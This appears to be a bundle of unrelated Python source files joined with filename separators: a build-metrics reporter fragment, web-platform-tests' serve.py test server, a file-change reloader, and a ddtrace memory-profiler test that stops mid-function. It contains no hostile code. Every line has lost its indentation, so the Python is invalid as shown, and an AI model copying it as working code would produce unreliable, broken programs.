f.write(str(metric))
f.write('\n')
def _metric_loop(self):
"""
Function for background daemon thread (only used if async=True) to consistently loop and write metrics to file.
"""
if not self.async_option:
return
if self._last_transmit_time is None:
self._last_transmit_time = time.time()
self._logger.info('Background metrics thread starting...')
while self._running:
try:
self._pending_condition.acquire()
try:
while (self._pending_metrics_queue.qsize() < MetricReporter.MAX_DATUM_COUNT_PER_REQUEST and
time.time()-self._last_transmit_time < MetricReporter.METRIC_QUEUE_TIMEOUT_SECS and
self._running and
not self._force_flush):
self._pending_condition.wait(timeout=MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
finally:
self._pending_condition.release()
self._force_flush = False
self._last_transmit_time = time.time()
if self._pending_metrics_queue.empty():
continue
self._write_metrics_to_file()
except Exception as e:
traceback.print_exc()
self._logger.error('Error in MetricsReporter thread: %s' % str(e))
time.sleep(MetricReporter.METRIC_QUEUE_TIMEOUT_SECS)
self.flush()
self._logger.info('Background metrics thread terminating...')
def submit_metric(recorder, name, units, value, dimensions=None, timestamp=None):
"""
This is just a convenience method that creates a MetricDatum,
populates it with a value and adds it to the pending queue on the supplied MetricRecorder.
"""
metric_datum = recorder.create_metric(name, units, timestamp)
metric_datum.value = value
if dimensions is None:
dimensions = {}
metric_datum.dimensions = dimensions
recorder.put_metric(metric_datum)
def submit_build_metric(name, units, value, dimensions, disable_dimension_unwrap=False, disable_no_dimension=False):
dim_list = []
if disable_dimension_unwrap:
dim_list.append(dimensions.copy())
else:
while dimensions:
dim_list.append(dimensions.copy())
dimensions.popitem()
if not disable_no_dimension:
dim_list.append({})
dim_list.reverse()
for dimension_dict in dim_list:
submit_metric(metric_reporter, name, units, value, dimension_dict)
def add_output_directory(out_dir):
metric_reporter.add_output_directory(out_dir)
def set_build_command(cmd):
metric_reporter.set_build_command(cmd)
metric_reporter = MetricReporter('WAF_BuildMetrics')
def stop_metric_reporter(gather_output_sizes=False, wait_for_empty_queue=False):
metric_reporter.stop(gather_output_sizes, gather_output_sizes)
def start_metric_reporter():
metric_reporter.start()
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts. "
"See https://github.com/web-platform-tests/wpt#running-the-tests "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = b""
for (key, value) in self._get_metadata(request):
if key == b"global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == b"timeout":
if value == b"long":
return '<meta name="timeout" content="long">'
if key == b"title":
value = value.decode('utf-8').replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == b"script":
attribute = value.decode('utf-8').replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = b"dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = b"window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = b"sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = b"serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == b"title":
value = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config):
paths = config.paths
bind_address = config.bind_address
aliases = config.aliases
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases),
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interpets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropraite
# for this context. These systems do not reserve any value for this
# purpose, so the inavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def build_config(override_path=None, **kwargs):
rv = ConfigBuilder()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
return parser
def run(**kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if config["check_subdomains"]:
check_subdomains(config)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, build_routes(config["aliases"]), **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while all(item.is_alive() for item in iter_procs(servers)) and not received_signal.is_set():
for item in iter_procs(servers):
item.join(1)
exited = [item for item in iter_procs(servers) if not item.is_alive()]
subject = "subprocess" if len(exited) == 1 else "subprocesses"
logger.info("%s %s exited:" % (len(exited), subject))
for item in iter_procs(servers):
logger.info("Status of %s:\t%s" % (item.name, "running" if item.is_alive() else "not running"))
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
statreload.py
|
import multiprocessing
import os
import signal
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started reloader process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
spawn = multiprocessing.get_context("spawn")
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.3)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
self.reload_count += 1
logger.info("Stopping reloader process [{}]".format(pid))
def clear(self):
self.mtimes = {}
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
except OSError as exc: # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
self.config.logger_instance.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
|
test_memalloc.py
|
# -*- encoding: utf-8 -*-
import gc
import os
import threading
import pytest
try:
from ddtrace.profiling.collector import _memalloc
except ImportError:
pytestmark = pytest.mark.skip("_memalloc not available")
from ddtrace.profiling import _nogevent
from ddtrace.profiling import _periodic
from ddtrace.profiling import recorder
from ddtrace.profiling.collector import memalloc
def test_start_twice():
_memalloc.start(64, 1000, 512)
with pytest.raises(RuntimeError):
_memalloc.start(64, 1000, 512)
_memalloc.stop()
def test_start_wrong_arg():
with pytest.raises(TypeError, match="function takes exactly 3 arguments \\(1 given\\)"):
_memalloc.start(2)
with pytest.raises(ValueError, match="the number of frames must be in range \\[1; 65535\\]"):
_memalloc.start(429496, 1000, 1)
with pytest.raises(ValueError, match="the number of frames must be in range \\[1; 65535\\]"):
_memalloc.start(-1, 1000, 1)
with pytest.raises(ValueError, match="the number of events must be in range \\[1; 65535\\]"):
_memalloc.start(64, -1, 1)
with pytest.raises(ValueError, match="the heap sample size must be in range \\[0; 4294967295\\]"):
_memalloc.start(64, 1000, -1)
with pytest.raises(ValueError, match="the heap sample size must be in range \\[0; 4294967295\\]"):
_memalloc.start(64, 1000, 345678909876)
def test_start_stop():
_memalloc.start(1, 1, 1)
_memalloc.stop()
# This is used by tests and must be equal to the line number where object() is called in _allocate_1k 😉
_ALLOC_LINE_NUMBER = 57
def _allocate_1k():
return [object() for _ in range(1000)]
def _pre_allocate_1k():
return _allocate_1k()
def test_iter_events():
max_nframe = 32
_memalloc.start(max_nframe, 10000, 512 * 1024)
_allocate_1k()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count >= 1000
# Watchout: if we dropped samples the test will likely fail
object_count = 0
for (stack, nframe, thread_id), size in events:
assert 0 < len(stack) <= max_nframe
assert nframe >= len(stack)
last_call = stack[0]
assert size >= 1 # size depends on the object size
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert thread_id == _nogevent.main_thread_id
assert last_call[0] == __file__
assert stack[1][0] == __file__
assert stack[1][1] == _ALLOC_LINE_NUMBER
assert stack[1][2] == "_allocate_1k"
object_count += 1
assert object_count >= 1000
def test_iter_events_dropped():
max_nframe = 32
_memalloc.start(max_nframe, 100, 512 * 1024)
_allocate_1k()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count == 100
assert alloc_count >= 1000
def test_iter_events_not_started():
with pytest.raises(RuntimeError, match="the memalloc module was not started"):
_memalloc.iter_events()
@pytest.mark.skipif(os.getenv("DD_PROFILE_TEST_GEVENT", False), reason="Test not compatible with gevent")
def test_iter_events_multi_thread():
max_nframe = 32
t = threading.Thread(target=_allocate_1k)
_memalloc.start(max_nframe, 10000, 512 * 1024)
_allocate_1k()
t.start()
t.join()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count >= 1000
# Watchout: if we dropped samples the test will likely fail
count_object = 0
count_thread = 0
for (stack, nframe, thread_id), size in events:
assert 0 < len(stack) <= max_nframe
assert nframe >= len(stack)
last_call = stack[0]
assert size >= 1 # size depends on the object size
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert last_call[0] == __file__
if thread_id == _nogevent.main_thread_id:
count_object += 1
assert stack[1][0] == __file__
assert stack[1][1] == _ALLOC_LINE_NUMBER
assert stack[1][2] == "_allocate_1k"
elif thread_id == t.ident:
count_thread += 1
assert stack[2][0] == threading.__file__
assert stack[2][1] > 0
assert stack[2][2] == "run"
assert count_object >= 1000
assert count_thread >= 1000
def test_memory_collector():
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r)
with mc:
_allocate_1k()
# Make sure we collect at least once
mc.periodic()
count_object = 0
for event in r.events[memalloc.MemoryAllocSampleEvent]:
assert 0 < len(event.frames) <= mc.max_nframe
assert event.nframes >= len(event.frames)
assert 0 < event.capture_pct <= 100
last_call = event.frames[0]
assert event.size > 0
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert event.thread_id == _nogevent.main_thread_id
assert event.thread_name == "MainThread"
count_object += 1
assert event.frames[2][0] == __file__
assert event.frames[2][1] == 150
assert event.frames[2][2] == "test_memory_collector"
assert count_object > 0
@pytest.mark.parametrize(
"ignore_profiler",
(True, False),
)
def test_memory_collector_ignore_profiler(ignore_profiler):
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r, ignore_profiler=ignore_profiler)
with mc:
object()
# Make sure we collect at least once
mc.periodic()
ok = False
for event in r.events[memalloc.MemoryAllocSampleEvent]:
for frame in event.frames:
if ignore_profiler:
assert frame[0] != _periodic.__file__
elif frame[0] == _periodic.__file__:
ok = True
break
if not ignore_profiler:
assert ok
def test_heap():
max_nframe = 32
_memalloc.start(max_nframe, 10, 8 * 1024)
x = _allocate_1k()
# Check that at least one sample comes from the main thread
thread_found = False
